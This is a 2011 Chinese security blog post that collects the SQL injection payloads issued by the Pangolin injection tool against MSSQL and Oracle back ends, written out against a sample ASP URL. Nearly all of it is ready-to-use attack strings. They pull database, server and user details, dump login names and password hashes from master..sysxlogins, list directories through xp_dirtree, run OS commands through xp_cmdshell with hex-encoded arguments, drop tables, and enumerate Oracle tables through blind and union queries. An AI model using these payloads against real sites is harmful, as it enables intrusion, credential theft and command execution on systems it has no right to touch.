穿山甲(pangolin)注入语句大全(怎么写的?)

Post by mrchen, 2011-4-14, Views:

原创文章如转载，请注明：转载自冠威博客 [ http://www.guanwei.org/ ]
本文链接地址：http://www.guanwei.org/post/securitytools/04/pangolin_sql_injection.html

MSSQL

newmess.asp?id=70' ;

drop table pangolin_test_table;
create table pangolin_test_table([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);--

declare @z nvarchar(4000) set @z=0x65003a005c00 insert pangolin_test_table execute master..xp_dirtree @z,1,1--

and 1=2 union all select char(94)+char(94)+char(94)+cast(cast(count(1) as varchar(8000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from pangolin_test_table--

and 1=2 union all select char(94)+char(94)+char(94)+cast(cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 * from (select top 替换值 [name],[isfile] from pangolin_test_table group by [name],[isfile] order by [isfile]) t order by [isfile] desc,[name] desc) t----
替换值从1开始，123456……

查version
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(@@version as nvarchar(4000))+char(94)+char(94)+char(94),null,null --
char(94)转换后是^

查DB name
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(db_name() as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查Server name
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(@@servername as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查Host name
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(and host_name()=0-- as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查system user
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(system_user as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查current user
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(user as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查privilege
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查Databases
newmess.asp?id=70' and 1=2 union all select top 1 char(94)+char(94)+char(94)+cast(cast([name] as nvarchar(4000))+char(94)+cast([filename] as nvarchar(4000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 dbid,name,filename from (select top 替换值 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t--
替换值从1开始，123456……

查Drivers
newmess.asp?id=70' ;drop table pangolin_test_table;--

newmess.asp?id=70' ;create table pangolin_test_table(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));--

newmess.asp?id=70' ;insert pangolin_test_table exec master.dbo.xp_availablemedia;--

newmess.asp?id=70' and 1=2 union all select top 1 char(94)+char(94)+char(94)+cast(cast([name] as nvarchar(4000))+char(94)+cast([type] as nvarchar(4000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 * from (select top 替换值 [name],[low],[high],[type] from pangolin_test_table group by [name],[low],[high],[type] order by [name]) t order by [name] desc)t--
替换值从1开始，123456……

newmess.asp?id=70' ;drop table pangolin_test_table;--

查Localgroupus
newmess.asp?id=70' ;drop table pangolin_test_table;--

newmess.asp?id=70' ;create table pangolin_test_table(name nvarchar(255),description nvarchar(4000));--

newmess.asp?id=70' ;insert pangolin_test_table exec master.dbo.xp_enumgroups;--

newmess.asp?id=70' and 1=2 union all select top 1 char(94)+char(94)+char(94)+cast(cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 * from (select top 1 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)t--

newmess.asp?id=70' and 1=2 union all select top 1 char(94)+char(94)+char(94)+cast(cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 * from (select top 替换值 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)t--
替换值从1开始，123456……

newmess.asp?id=70' ;drop table pangolin_test_table;--

查users
newmess.asp?id=70' and 1=2 union all select top 1 char(94)+char(94)+char(94)+cast(cast([name] as nvarchar(4000))+char(94)+isnull(master.dbo.fn_varbintohexstr([password]),char(32)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 * from (select top 1 [name],[password] from master..sysxlogins where xstatus!=192 order by [name]) t order by [name] desc)t--

获取表
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(cast(count(1) as varchar(10)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from [metc]..[sysobjects] where xtype=char(85) and status%3E0--
%3E是>号

执行命令
newmess.asp?id=70' ;create table [pangolin_test_table]([resulttxt] nvarchar(4000) null);--

newmess.asp?id=70' ;declare @z nvarchar(4000) set @z=0x640069007200200063003a005c00 insert into [pangolin_test_table](resulttxt) exec master.dbo.xp_cmdshell @z;alter table [pangolin_test_table] add id int not null identity (1,1)--

newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(count(1) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from [metc]..[pangolin_test_table]--

newmess.asp?id=70' ;drop table [pangolin_test_table];--

Oracle

盲注猜解

/new/new_content.jsp?dtxx_id=881 and (select ascii(substr(table_name,6,1)) from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum%3C=1 order by 1 desc) t where r%3E1-1 order by 1)t)>0 and 1=1 HTTP/1.1

用union依次爆出所有的表

and 1=3 union select table_name from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum<=1 order by 1 desc) t where r>0 order by 1)t --

and 1=3 union select table_name from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum<=2 order by 1 desc) t where r>1 order by 1)t --

and 1=3 union select table_name from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum<=3 order by 1 desc) t where r>2 order by 1)t --

Tags: 穿山甲 pangolin 注入注入语句大全
本文未看懂？联系冠威客服，享受手把手服务，远程、现场任您选。优惠期间，免费服务！
有更好的解决方案？联系冠威客服，加入冠威，成为冠威客。发表文章，赚取佣金！
冠威客服：E-mail:Service@GuanWei.Org QQ:1026092

合作伙伴：淘男网

分类:安全工具 | 评论:0 | 引用:0

分享到：

上一篇：组策略用户配置管理模板与注册表对应键值
下一篇：UDP数据包大小一般为多少？什么是碎片包？

或许你还对下面的文章感兴趣

有关黑客的经典电影大全 (2010-6-28 12:4:43)
SQL手工注入方法总结(私人收藏) (2010-6-12 22:26:31)
[pasc2at]高级PHP应用程序漏洞审核技术 (2010-4-18 21:21:56)
php+Mysql注入详解(三) (2010-4-18 21:14:27)
php+Mysql注入详解(二) (2010-4-18 21:0:37)
php+Mysql注入详解(一) (2010-4-18 20:32:21)

穿山甲(pangolin)注入语句大全(怎么写的?)

或许你还对下面的文章感兴趣

Comments

Hot Articles

New Articles

Last Comments

Guest